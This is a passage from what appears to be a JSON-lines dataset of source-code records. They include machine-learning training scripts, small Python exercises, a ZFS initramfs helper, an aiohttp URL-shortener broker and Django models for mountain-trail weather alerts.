parameter\ntf.flags.DEFINE_integer(\"stack_num\", 2, 'stack num')\ntf.flags.DEFINE_integer(\"d_k\", 64, 'key dim')\ntf.flags.DEFINE_integer(\"d_v\", 64, 'value dim')\ntf.flags.DEFINE_integer(\"h\", 8, 'stack of multihead attention')\ntf.flags.DEFINE_integer(\"d_ff\", 256, 'feed forward dim')\ntf.flags.DEFINE_float('dropout_keep', 0.8, 'dropout keep rate')\n\n#hyper parameters\ntf.flags.DEFINE_integer(\"batch_size\", 2, \"Batch Size (default: 64)\")\ntf.flags.DEFINE_integer(\"num_epochs\", 1000, \"Number of training epochs (default: 200)\")\ntf.flags.DEFINE_integer(\"evaluate_every\", 50, \"Evaluate model on dev set after this many steps (default: 
100)\")\ntf.flags.DEFINE_integer(\"early_stop\", 10, \"Stop if no improvement after x epoch\")\n\n\n# Misc Parameters\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\n\n#getting path of data\nx = os.path.join(FLAGS.data_path, FLAGS.train)\nx_dev = os.path.join(FLAGS.data_path, FLAGS.validation)\n\n#opening data\nX = np.load(x)\nX_dev = np.load(x_dev)\n\n\n\ndev_mode = \"Test\" if FLAGS.eval else \"Validation\"\n\n#stack data per videos : size [videos, uterances, feature_size]\nX_sorted, Y_sorted, X_seq_length, X_pad_length = utils.get_sorted_data(X, \"Train\", FLAGS.data_path)\nX_dev_sorted, Y_dev_sorted, X_dev_seq_length, X_dev_pad_length = utils.get_sorted_data(X_dev, dev_mode, FLAGS.data_path)\n\n\n#creating checkpoint folder\nout_dir = os.path.join(FLAGS.checkpoint_path, str(int(time.time())))\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\nwith tf.Graph().as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n\n model = Transformer(num_features=X.shape[1],\n batch_size=FLAGS.batch_size,\n stack_num=FLAGS.stack_num,\n d_k=FLAGS.d_k,\n d_v=FLAGS.d_v,\n h=FLAGS.h,\n d_ff=FLAGS.d_ff,\n pad_length=X_pad_length\n )\n\n model_dev = Transformer(num_features=X_dev_sorted.shape[2],\n batch_size=X_dev_sorted.shape[0],\n stack_num=FLAGS.stack_num,\n d_k=FLAGS.d_k,\n d_v=FLAGS.d_v,\n h=FLAGS.h,\n d_ff=FLAGS.d_ff,\n pad_length=X_dev_pad_length,\n )\n\n\n # Define Training procedure\n train_op = tf.train.AdamOptimizer(1e-4).minimize(model.loss)\n global_step = 0\n\n saver = tf.train.Saver(tf.all_variables())\n sess.run(tf.initialize_all_variables())\n\n\n def train_step(X_batch, Y_batch, X_batch_seq_length):\n \"\"\"\n A single training step\n \"\"\"\n feed_dict = {\n model.inputs: X_batch,\n model.outputs: Y_batch,\n model.inputs_lengths: X_batch_seq_length,\n model.dropout_keep_prob: FLAGS.dropout_keep\n }\n\n _, loss = sess.run(\n [train_op, model.loss],\n feed_dict)\n\n def dev_step(X_batch, Y_batch, X_batch_seq_length):\n \"\"\"\n A single training step\n \"\"\"\n feed_dict = {\n model_dev.inputs: X_batch,\n model_dev.outputs: Y_batch,\n model_dev.inputs_lengths: X_batch_seq_length,\n model_dev.dropout_keep_prob: 1.0\n }\n\n loss, scores = sess.run(\n [model_dev.loss, model_dev.masked_scores],\n feed_dict)\n scores = np.array(scores).T\n\n mean_ccc = utils.write_ccc_csv(scores, FLAGS.calculateEvaluationCCC, FLAGS.fileCSV, out_dir, verbose=False)\n\n #0 is mean, 1 is ar, 2 is val\n if mean_ccc[0] > dev_step.best_loss[0]:\n dev_step.best_loss = mean_ccc\n\n path = saver.save(sess, os.path.join(out_dir, \"checkpoint\"), global_step=global_step)\n\n best_scores_path = os.path.join(out_dir, \"best_scores.txt\")\n with open(best_scores_path , \"a+\") as f:\n f.write(\"{} \\t {} \\n\".format(global_step, dev_step.best_loss[0]))\n\n dev_step.early_stop = 0\n\n time_str = datetime.datetime.now().isoformat()\n print(\"dev {}: step {}, loss {}\".format(time_str, global_step, loss))\n\n\n dev_step.best_loss = [0.0, 0.0, 0.0]\n dev_step.early_stop = 0\n # Generate batches\n batches = utils.batch_iter(X_sorted, Y_sorted, X_seq_length, FLAGS.batch_size, FLAGS.num_epochs)\n\n # Training loop. 
For each batch...\n for batch in batches:\n global_step += 1\n\n X_batch, Y_batch, X_batch_seq_length = batch\n train_step(X_batch, Y_batch, X_batch_seq_length)\n if global_step % FLAGS.evaluate_every == 0:\n dev_step.early_stop += 1\n print(\"Evaluation:\")\n dev_step(X_dev_sorted, Y_dev_sorted, X_dev_seq_length)\n print(\"\")\n\n how_many_eval = int((X_sorted.shape[0]/FLAGS.batch_size/FLAGS.evaluate_every)*10)\n if dev_step.early_stop == how_many_eval:\n with open(os.path.join(\"runs\", \"best_scores_overall.txt\"), \"a+\") as f:\n f.write(\"{}({}/{}) \\t {} \\n\".format(dev_step.best_loss[0], dev_step.best_loss[1], dev_step.best_loss[2], out_dir))\n sys.exit()\n","sub_path":"context/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"405354126","text":"'''锁:解决数据不安全问题'''\n\nfrom threading import Thread\nimport time\nfrom multiprocessing import Lock\nnum = 100\n\ndef func(t_lock):\n global num\n # num -= 1\n t_lock.acquire()\n mid = num\n mid = mid - 1\n\n time.sleep(0.00001)\n num = mid\n t_lock.release()\nif __name__ == '__main__':\n t_lock = Lock() #锁对象,同步锁\n t_lst = []\n for i in range(10):\n t = Thread(target=func,args=(t_lock,))\n t.start()\n t_lst.append(t)\n [tt.join() for tt in t_lst]\n print('主线程>>>',num)\n\n\n\n","sub_path":"day27/04-线程数据共享不安全.py","file_name":"04-线程数据共享不安全.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"109617085","text":"from sys import argv\n\nscript, filename =argv\n\nfileopen = open(filename,'r+')\nprint(\"currently this file has below text \\n\")\n\nprint(fileopen.read())\n\nprint(\"do you want to append \\n if no then press ctrl c \")\n\ninput(\"? \")\n\nfileopen.truncate()\nprint(\" ready to type few line to add\")\n\nline1 = input(\"type your first line \")\nline2 = input(\"add more line \")\nline3 = input(\" pick your last line \" )\n\nfileopen.write(line1 +\"\\n\"+ line2+\"\\n\"+line3+ \"\\n\")\n\n\n\n#close the file\n\nfileopen.close()\n\n\n\n\n\n\n","sub_path":"Desktop/Project_codes/Learn Python the hard way/ex16a.py","file_name":"ex16a.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"407683079","text":"#!/usr/bin/env python\n# -- coding: UTF-8 --\n\n\"\"\"\nShort Description: Enriches Table C by clustering the remaining Si-Ai synonyms that are not attractors\nComments: find_best_attractor can be improved. Can't really understand the influence of the vector distance\nwith the example date you gave me. From what I saw, it does not influence in the clustering. 
Needs further analysis.\n\nCreated on 10/06/2017\n\n:author: hpcosta\n\"\"\"\n\nimport logging\nimport json\nfrom similarity.vector_distance import VectorDistance\nfrom similarity.string_similarity import StringSimilarity\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p ::')\n\n\nclass EnrichingTableC(object):\n\t\"\"\" docstring \"\"\"\n\n\tdef __init__(self, table_c_with_attractor, m_t, attractors_list):\n\t\t\"\"\"Constructor for clustering\"\"\"\n\t\tself.table_c_with_attractor = table_c_with_attractor\n\t\tself.m_t = m_t\n\t\tself.attractors_list = attractors_list\n\t\tself.vec_dist = VectorDistance(self.m_t)\n\t\tself.string_sim = StringSimilarity()\n\t\tself.enriched_table_c = dict()\n\n\tdef clustering(self):\n\t\t\"\"\"\n\t\tClusters the remaining s synonyms that are not attractors to the table C, i.e. to Ai\n\t\t\"\"\"\n\t\tattractor_synset = dict((i, list()) for i in self.attractors_list)\n\t\tsynonyms_already_taken = list(self.attractors_list)\n\t\tfor m_t_code, m_t_value in self.m_t.iteritems(): # m_t = {code{description, synset[synonyms]}}\n\n\t\t\tfor description, synset in m_t_value.iteritems(): # {description, synset[synonyms]}\n\n\t\t\t\tfor synonym in synset: # synset[synonyms] in m_t\n\t\t\t\t\t# S-Ai\n\t\t\t\t\t# print('SYNONYM: ' + synonym)\n\t\t\t\t\tif synonym.lower() not in synonyms_already_taken:\n\t\t\t\t\t\tsynonyms_already_taken.append(synonym.lower())\n\t\t\t\t\t\tbest_attractor = self.find_best_attractor(synonym)\n\t\t\t\t\t\t# print('for this synonym: ' + synonym)\n\t\t\t\t\t\t# print('the best attractor is: ' + best_attractor)\n\n\t\t\t\t\t\t# appending the synonyms to the right synset\n\t\t\t\t\t\tif best_attractor in attractor_synset:\n\t\t\t\t\t\t\tprev_syn_list = attractor_synset[best_attractor]\n\t\t\t\t\t\t\tprev_syn_list.append(synonym)\n\t\t\t\t\t\t\tattractor_synset[best_attractor] = prev_syn_list\n\n\t\t# print(json.dumps(attractor_synset, sort_keys=True, indent=4))\n\t\tself.__build_enriched_table_c(attractor_synset)\n\n\tdef find_best_attractor(self, synonym):\n\t\t\"\"\"\n\t\tGiven a synonym Si this functions finds the best attractor Ai\n\t\t:param synonym: Si\n\t\t:type synonym: str\n\t\t:return: Ai\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tmax_sim = -1\n\t\tbest_attractor = ''\n\t\tfor attractor in self.attractors_list:\n\t\t\tv_dis = self.vec_dist.cal_vect_dist(attractor, synonym)\n\t\t\ts_sim = self.string_sim.calc_similarity(attractor, synonym)\n\t\t\tcurrent_sim = (v_dis + s_sim) / 2.0\n\t\t\tif current_sim > max_sim:\n\t\t\t\tmax_sim = current_sim\n\t\t\t\tbest_attractor = attractor\n\t\treturn best_attractor\n\n\tdef __build_enriched_table_c(self, attractor_synset):\n\t\t\"\"\"\n\t\tBuilds the enriched table c\n\t\t:param attractor_synset: attractor dictionary with the associated synset of synonyms\n\t\t:type attractor_synset: dict(attractor[synset])\n\t\t\"\"\"\n\t\tfor code, descriptor_dict in self.table_c_with_attractor.iteritems():\n\t\t\tfor descriptor, attractor in descriptor_dict.iteritems():\n\t\t\t\tnew_synset = attractor_synset[attractor.lower()]\n\t\t\t\tnew_synset.insert(0, attractor)\n\t\t\t\tnew_description_dict = dict()\n\t\t\t\tnew_description_dict[descriptor] = new_synset\n\t\t\t\tself.enriched_table_c[code] = new_description_dict\n","sub_path":"enricher_module/enriching_table_c.py","file_name":"enriching_table_c.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} 
+{"seq_id":"592556974","text":"\n\n#calss header\nclass _HIRE():\n\tdef __init__(self,): \n\t\tself.name = \"HIRE\"\n\t\tself.definitions = [u'an arrangement to use something by paying for it: ', u'a person to whom a company has recently given a job: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_hire.py","file_name":"_hire.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"574463776","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\nimport sys\n\nimport libzfs\nimport pyudev\n\n\nif __name__ == \"__main__\":\n boot_pool, root, update_initramfs_if_changes = sys.argv[1:]\n\n with libzfs.ZFS() as zfs:\n disks = [disk.replace(\"/dev/\", \"\") for disk in zfs.get(boot_pool).disks]\n\n mapping = {}\n for dev in filter(\n lambda d: not d.sys_name.startswith(\"sr\") and d.get(\"DEVTYPE\") in (\"disk\", \"partition\"),\n pyudev.Context().list_devices(subsystem=\"block\")\n ):\n if dev.get(\"DEVTYPE\") == \"disk\":\n mapping[dev.sys_name] = dev.get(\"ID_BUS\")\n elif dev.get(\"ID_PART_ENTRY_UUID\"):\n parent = dev.find_parent(\"block\")\n mapping[dev.sys_name] = parent.get(\"ID_BUS\")\n mapping[os.path.join(\"disk/by-partuuid\", dev.get(\"ID_PART_ENTRY_UUID\"))] = parent.get(\"ID_BUS\")\n\n has_usb = False\n for dev in disks:\n if mapping.get(dev) == \"usb\":\n has_usb = True\n break\n\n zfs_config_path = os.path.join(root, \"etc/default/zfs\")\n with open(zfs_config_path) as f:\n original_config = f.read()\n lines = original_config.rstrip().split(\"\\n\")\n\n zfs_var_name = \"ZFS_INITRD_POST_MODPROBE_SLEEP\"\n lines = [line for line in lines if not line.startswith(f\"{zfs_var_name}=\")]\n if has_usb:\n lines.append(f\"{zfs_var_name}=15\")\n\n new_config = \"\\n\".join(lines) + \"\\n\"\n\n if new_config != original_config:\n with open(zfs_config_path, \"w\") as f:\n f.write(new_config)\n\n if update_initramfs_if_changes == \"1\":\n subprocess.run([\"chroot\", root, \"update-initramfs\", \"-k\", \"all\", \"-u\"], check=True)\n","sub_path":"src/freenas/usr/local/bin/initrd-zfs.py","file_name":"initrd-zfs.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244297588","text":"import csv\nfrom time import sleep\nfrom os import path\n\npossible = [\n [year, month, day]\n for year in range(2013, 2020)\n for month in range(1, 13)\n for day in range(1, 32)\n]\n\noverall = [\n [\n \"slug\",\n \"name\",\n \"team\",\n \"location\",\n \"opponent\",\n \"outcome\",\n \"seconds_played\",\n \"made_field_goals\",\n \"attempted_field_goals\",\n \"made_three_point_field_goals\",\n \"attempted_three_point_field_goals\",\n \"made_free_throws\",\n \"attempted_free_throws\",\n \"offensive_rebounds\",\n \"defensive_rebounds\",\n \"assists\",\n \"steals\",\n \"blocks\",\n \"turnovers\",\n \"personal_fouls\",\n \"game_score\",\n \"year\",\n \"month\",\n \"day\",\n ]\n]\n\nfor date in possible:\n year, month, day = date\n\n p1 = \"./individual/\"\n p2 = \"-\".join([str(year), str(month), str(day)])\n p3 = \"-score.csv\"\n\n file = p1 + p2 + p3\n\n if path.exists(file):\n with open(file, \"r\") as f:\n page = [row for row in csv.reader(f)]\n if len(page) > 1:\n for row in page[1:]:\n p = row\n # print(date[0], date[1], date[2], 
\"~player:\", p[1])\n for i in date:\n p.append(i)\n # p.append(date[0])\n # p.append(date[1])\n # p.append(date[2])\n overall.append(p)\n print(\"Done with this file --\", file)\n sleep(1)\n else:\n print(\"NOTE: This file only had 1 row --\", file)\n pass\n\n else:\n print(\"WARNING: This file does not exist --\", file)\n pass\n\nwith open(\"box-scores.csv\", \"w\") as file:\n csvWriter = csv.writer(file, delimiter=\",\")\n csvWriter.writerows(overall)\n","sub_path":"combine-box-scores.py","file_name":"combine-box-scores.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"576656843","text":"import json\nimport asyncio\n\nfrom aiohttp import web\nimport zmq\nimport aiozmq\n\nfrom svc.broker.task_dispatcher import TaskDispatcher, DispatchNoFreeWorkerError, \\\n DispatchTimeoutError, DispatchBadRequestError\n\n\nclass Handler():\n task_dispatcher = None\n\n def __init__(self, task_dispatcher):\n self.task_dispatcher = task_dispatcher\n\n @asyncio.coroutine\n def shorten(self, request):\n post_data = yield from request.json()\n data = {\"post_data\": post_data}\n\n try:\n result = yield from self.task_dispatcher.process('shorten', json.dumps(data))\n except (DispatchNoFreeWorkerError, asyncio.CancelledError):\n return web.web_exceptions.HTTPInternalServerError()\n except DispatchTimeoutError:\n return web.web_exceptions.HTTPRequestTimeout()\n except DispatchBadRequestError:\n return web.web_exceptions.HTTPBadRequest()\n\n return web.Response(\n body=json.dumps(result).encode('utf-8'),\n content_type='application/json')\n\n @asyncio.coroutine\n def expand(self, request):\n\n params = {\n 'ua_string': request.headers[\"USER-AGENT\"],\n 'short_url': request.match_info['hash']\n }\n\n try:\n result = yield from self.task_dispatcher.process('expand', json.dumps(params))\n\n except (DispatchNoFreeWorkerError, asyncio.CancelledError):\n return web.web_exceptions.HTTPInternalServerError()\n except DispatchTimeoutError:\n return web.web_exceptions.HTTPRequestTimeout()\n except DispatchBadRequestError:\n return web.web_exceptions.HTTPBadRequest()\n if result:\n return web.Response(\n body=json.dumps(result).encode('utf-8'),\n content_type='application/json')\n else:\n return web.web_exceptions.HTTPNotFound() # 404\n\n\n@asyncio.coroutine\ndef start_task_dispatcher(loop=None):\n if not loop:\n loop = asyncio.get_event_loop()\n\n dispatcher_closed = asyncio.Future()\n _, task_dispatcher = yield from aiozmq.create_zmq_connection(\n lambda: TaskDispatcher(dispatcher_closed, loop),\n zmq.ROUTER,\n bind='tcp://{}:{}'.format('0.0.0.0', 7777),\n loop=loop\n )\n # logger.info(\"Starting mixer zmq connection at {host}:{port}\".format(\n # host='0.0.0.0', port=7777))\n return task_dispatcher, dispatcher_closed\n\n\nif __name__ == '__main__':\n\n app = web.Application()\n loop = asyncio.get_event_loop()\n task_dispatcher, dispatcher_closed = loop.run_until_complete(\n start_task_dispatcher(loop=loop)\n )\n\n handler = Handler(task_dispatcher)\n\n app = web.Application()\n \"\"\"\n curl -H \"Content-Type: application/json\" -X POST -d '{\"domain\":\"pm.me\",\"urls\":{\"apple\":\"https://itunes.apple.com/us/app/valutcik/id978512096?mt=8\",\"android\":\"https://play.google.com/store/apps/details?id=me.valutchik.app\"},\"appId\":\"app-id-123\",\"userId\":\"1234567\"}' localhost:8080/shorten\n \"\"\"\n app.router.add_route('POST', r'/shorten', handler.shorten)\n app.router.add_route('GET', r'/expand/{hash}', 
handler.expand)\n\n # loop = asyncio.get_event_loop()\n f = loop.create_server(\n app.make_handler(), '0.0.0.0', 8011)\n srv = loop.run_until_complete(f)\n print('serving on', srv.sockets[0].getsockname())\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n","sub_path":"mixer.py","file_name":"mixer.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"601796397","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport subprocess\n\nthisdir = os.path.dirname(os.path.realpath(__file__))\nbasedir = os.path.dirname(thisdir)\nsys.path.append(basedir)\nimport config\n\npoint = ' '.join(sys.argv[1:])\n\noutdir = config.histDir + '/simplified_xsec'\n\nif point == 'combine':\n\n values = {}\n\n for fname in os.listdir(outdir):\n with open(outdir + '/' + fname) as source:\n for line in source:\n line = line.strip()\n if 'final cross section' in line:\n values[fname.replace('.dat', '')] = line[line.find('=') + 2:]\n break\n\n with open(outdir + '/xsec.txt', 'w') as output:\n for point in sorted(values.keys()):\n output.write(point + ' ' + values[point] + '\\n')\n\nelse:\n outname = outdir + '/' + point.replace('[', '').replace(']', '').replace(' ', '_') + '.dat'\n if os.path.exists(outname):\n sys.exit(0)\n\n files = None\n with open('simplified_fastsim.txt') as flist:\n for line in flist:\n line = line.strip()\n if line.startswith(point):\n files = []\n continue\n \n if files is None:\n continue\n \n if not line:\n break\n \n files.append(line)\n \n inputFiles = ' '.join(['inputFiles=%s' % f for f in files])\n \n output = open(outname, 'w')\n \n proc = subprocess.Popen('source /cvmfs/cms.cern.ch/cmsset_default.sh;export X509_USER_PROXY=/home/' + os.environ['USER'] + '/x509up_u' + str(os.getuid()) + '; cd ' + os.environ['CMSSW_BASE'] + ';eval `scram runtime -sh`;cmsRun genxsec.py ' + inputFiles, shell = True, stdout = output, stderr = subprocess.STDOUT)\n \n proc.communicate()\n \n output.close()\n","sub_path":"monophoton/misc/simplified_xsec.py","file_name":"simplified_xsec.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511722963","text":"# coding=utf-8 \n \nfrom __future__ import unicode_literals \n \nimport datetime \n \nfrom django.core.validators import MinValueValidator \nfrom django.db import models \nfrom django.utils import timezone \n \nfrom django.utils.translation import ugettext_lazy as _ \n \nKOLORY_SZLAKOW = (('zo', _(u'żółty')), ('n', _('niebieski')), ('z', _('zielony')), ('cza', _('czarny')), ('cze', _('czerwony'))) \n \n \nclass Wiatr(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n predkosc_minimalna = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Prędkość minimalna')) \n predkosc_maksymalna = models.IntegerField(validators=[MinValueValidator(0)], verbose_name=_(u'Prędkość maksymalna')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień wiatru') \n verbose_name_plural=_(u'Stopnie wiatru') \n \n \nclass Mgla(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n opis = models.TextField(verbose_name=_(u'Opis')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień mgły') \n 
verbose_name_plural = _(u'Stopnie mgły') \n \n \nclass Temperatura(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n powyzej = models.IntegerField(verbose_name=_(u'Powyżej')) \n ponizej = models.IntegerField(verbose_name=_(u'Poniżej')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień temperatury') \n verbose_name_plural = _(u'Stopnie temperatury') \n \n \nclass Deszcz(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n deszcz_minimalny = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Deszcz minimanly')) \n deszcz_maksymalny = models.IntegerField(validators=[MinValueValidator(0)], verbose_name=_(u'Deszcz maksymalny')) \n wiatr = models.ForeignKey(Wiatr, verbose_name=_(u'Wiatr')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień deszczu') \n verbose_name_plural =_(u'Stopnie deszczu') \n \n \nclass Lawina(models.Model): \n stopien = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Stopień')) \n opis = models.TextField(verbose_name=_(u'Opis')) \n \n def __unicode__(self): \n return str(self.stopien) \n \n class Meta: \n verbose_name=_(u'Stopień lawiny') \n verbose_name_plural = _(u'Stopnie lawiny') \n \n \nDZIALANIA = ( \n ('sm', _('System monitoruje')), \n ('mt', _(u'Monitorowanie turystów na zagrożonych obszarach')), \n ('wd', _(u'Wysłanie drona w celu lepszego monitorowania szlaku')), \n ('wder', _(u'Wysłanie drona do zbadania sytuacji i podjęcia decyzji o wysłaniu ekipy ratowniczej')),\r\n ('pt', _(u'Przechwycenie turystów')) \n ) \n \nclass StanAlarmowy(models.Model): \n poziom = models.IntegerField(validators=[MinValueValidator(0)], blank=False, verbose_name=_(u'Poziom')) \n dzialanie = models.CharField(max_length=255, blank=False, choices=DZIALANIA, default='sm', verbose_name=_(u'Działanie')) \n \n def __unicode__(self): \n return str(self.poziom) \n \n class Meta: \n verbose_name=_(u'Stan alarmowy') \n verbose_name_plural = _(u'Stany alarmowe') \n \n \nclass Szlak(models.Model): \n stan_alarmowy = models.ForeignKey(StanAlarmowy, verbose_name=_(u'Stan alarmowy')) \n KML = models.TextField(blank=False) \n trudnosc = models.IntegerField(validators=[MinValueValidator(1)], verbose_name=_(u'Trudność')) \n kolor = models.CharField(max_length=255, choices=KOLORY_SZLAKOW, verbose_name=_(u'Kolor')) \n nazwa = models.CharField(max_length=255, verbose_name=_(u'Nazwa')) \n \n def __unicode__(self): \n return self.nazwa \n \n class Meta: \n verbose_name=_(u'Szlak') \n verbose_name_plural = _(u'Szlaki') \n \n \nclass Pogoda(models.Model): \n wiatr = models.ForeignKey(Wiatr, verbose_name=_(u'Stopień wiatru')) \n mgla = models.ForeignKey(Mgla, verbose_name=_(u'Stopień mgły')) \n temperatura = models.ForeignKey(Temperatura, verbose_name=_(u'Stopień temperatury')) \n deszcz = models.ForeignKey(Deszcz, verbose_name=_(u'Stopień deszczu')) \n lawina = models.ForeignKey(Lawina, verbose_name=_(u'Stopień lawiny')) \n czas = models.DateTimeField(blank=False, verbose_name=_(u'Czas')) \n szlak = models.ForeignKey(Szlak, null=True, verbose_name=_(u'Szlak')) \n \n def __unicode__(self): \n return str(self.czas) \n \n def zwroc_stan_alarmowy(self): \n stopnie_pogoda = self.wiatr.stopien + self.mgla.stopien + self.temperatura.stopien + self.deszcz.stopien + self.lawina.stopien \n skala = 
round((stopnie_pogoda + self.szlak.trudnosc) / 4.0) \n return StanAlarmowy.objects.order_by('poziom').filter(poziom__gte=skala).first() \n \n def save(self, *args, **kwargs): \n if self.czas > timezone.now() - datetime.timedelta(minutes=5): \n self.szlak.stan_alarmowy = self.zwroc_stan_alarmowy() \n self.szlak.save() \n super(Pogoda, self).save(*args, **kwargs) \n \n class Meta: \n verbose_name=_(u'Pogoda') \n verbose_name_plural = _(u'Pogody') \n \n \nclass StrefaZagrozenia(models.Model): \n pozycja_N = models.FloatField(verbose_name=_(u'Pozycja N')) \n pozycja_E = models.FloatField(verbose_name=_(u'Pozycja E')) \n promien = models.IntegerField(help_text = 'jednostka [m]', verbose_name=_(u'Promień')) \n nazwa = models.CharField(max_length=255, verbose_name=_(u'Nazwa')) \n\t \n def __unicode__(self):\n return self.nazwa\r\n \r\n class Meta:\r\n verbose_name=_(u'Strefa zagrożenia')\r\n verbose_name_plural=_(u'Strefy zagrożenia')","sub_path":"system_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"594926517","text":"import transformers\nfrom transformers import BertGenerationTokenizer, BertGenerationConfig, BertGenerationDecoder\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\nconfiguration = BertGenerationConfig(is_decoder=True)\n\nmodel = BertGenerationDecoder.from_pretrained('google/bert_for_seq_generation_L-24_bbc_encoder', is_decoder=True)\ntokenizer = BertGenerationTokenizer.from_pretrained('google/bert_for_seq_generation_L-24_bbc_encoder')\nrandom_size = (1, 512)\n\n\ndef getRandomTensor():\n multiplier = np.random.randint(low=1, high=28996)\n random_vec = multiplier*torch.rand(random_size)\n random_vec = random_vec.long()\n return random_vec\n\n\ndef readFile(filename):\n file = open(filename)\n file_contents = file.read()\n contents_split = file_contents.splitlines()\n return contents_split\n\n\nv = readFile('bert-base-cased-vocab.txt')\n\nif __name__ == '__main__':\n sent = []\n for i in range(10):\n print(i)\n random_vector = getRandomTensor()\n output = model(random_vector)\n print(output.shape)\n softmax = nn.Softmax(dim=1)\n prob = softmax(output.logits.squeeze())\n idx = torch.argmax(torch.argmax(prob, dim=0)).item()\n if idx > 28996:\n idx = np.random.randint(low=1, high=30522)\n sent.append(v[idx])\n print(\" \".join(sent))\n","sub_path":"BERT_GAN/BERT_baseline.py","file_name":"BERT_baseline.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638958216","text":"from builtins import int\n\nimport logging\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\n\nimport torch.nn.functional as F\n\nfrom src.chamfer_distance.chamfer_distance import chamfer_distance_with_batch\n# from src.dataset.data_utils import plot_pc\nfrom src.dataset.shapenet import ShapeDiffDataset\nfrom src.pytorch.region_select import FilterLocalization\nfrom src.pytorch.pointnet import PointNetDenseCls, PointNetCls\nfrom src.pytorch.range_bounds import RegularizedClip\n\n\nclass Encoder(nn.Module):\n def __init__(self, num_cubes):\n super(Encoder, self).__init__()\n self.num_cubes = num_cubes\n\n # input: torch.Size([bs, 3, num_points])\n self.dens = PointNetDenseCls(k=3) # torch.Size([bs, 3, num_points])\n\n # input: torch.Size([bs, 3, num_points])\n self.cls_prob = PointNetCls(k=num_cubes) # torch.Size([bs, k])\n self.fc_mu = PointNetCls(k=3 
* num_cubes) # torch.Size([bs, 3k])\n self.fc_mat = PointNetCls(k=3 * num_cubes) # torch.Size([bs, 3k])\n\n def forward(self, x):\n \"\"\"\n :param x: input tensor: torch.Size([bs, 3, num_points])\n :return: probs in torch.Size([bs, num_cubes]), mu in torch.Size([bs, 3*num_cubes]),\n sigma in torch.Size([bs, 9*num_cubes])\n \"\"\"\n h1 = self.dens(x)\n\n return F.softmax(self.cls_prob(h1), dim=1), self.fc_mu(h1), self.fc_mat(h1)\n\n\nclass VAELoss(nn.Module):\n def __init__(self, cd_coeff=5.):\n \"\"\"\n\n :param coeff: list in length 3\n \"\"\"\n super(VAELoss, self).__init__()\n\n self.cd_coeff = cd_coeff\n\n self.loss = None\n\n def forward(self, x_diff_pred, x_diff_target):\n \"\"\"\n gives the batch normalized Variational Error.\n\n :param x_diff_pred: predicted completion: in shape (bs, num_points (N), 3)\n :param x_diff_target: ground trough completion: in shape (bs, num_points (M), 3)\n :return: scalar\n \"\"\"\n\n # points and points_reconstructed are n_points x 3 matrices\n if x_diff_pred.shape[1] == 0:\n logging.info(\"Found partial with no positive probability cubes: \" + str(x_diff_pred.shape))\n CD = 100\n else:\n CD = chamfer_distance_with_batch(x_diff_pred, x_diff_target, False)\n\n self.loss = self.cd_coeff * CD\n\n\nclass 